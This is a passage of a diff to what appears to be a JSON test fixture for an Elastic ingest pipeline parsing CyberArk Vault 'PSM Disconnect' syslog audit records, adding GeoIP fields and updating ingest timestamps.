\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -663,10 +708,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -750,7 +804,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813801300Z", + "ingested": "2021-12-14T14:42:15.678831707Z", "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -774,17 +828,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -866,7 +938,7 @@ "event": { "severity": 2, "duration": 18000000000, - "ingested": "2021-12-09T13:36:49.813806700Z", + "ingested": "2021-12-14T14:42:15.678832123Z", "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -890,17 +962,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -982,7 +1072,7 @@ "event": { "severity": 2, "duration": 54000000000, - "ingested": "2021-12-09T13:36:49.813812100Z", + "ingested": "2021-12-14T14:42:15.678832523Z", "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1006,17 +1096,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1096,7 +1204,7 @@ "event": { "severity": 2, "duration": 95000000000, - "ingested": "2021-12-09T13:36:49.813817400Z", + "ingested": "2021-12-14T14:42:15.678832916Z", "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1120,17 +1228,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1210,7 +1336,7 @@ "event": { "severity": 2, "duration": 73000000000, - "ingested": "2021-12-09T13:36:49.813822700Z", + "ingested": "2021-12-14T14:42:15.678833318Z", "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating 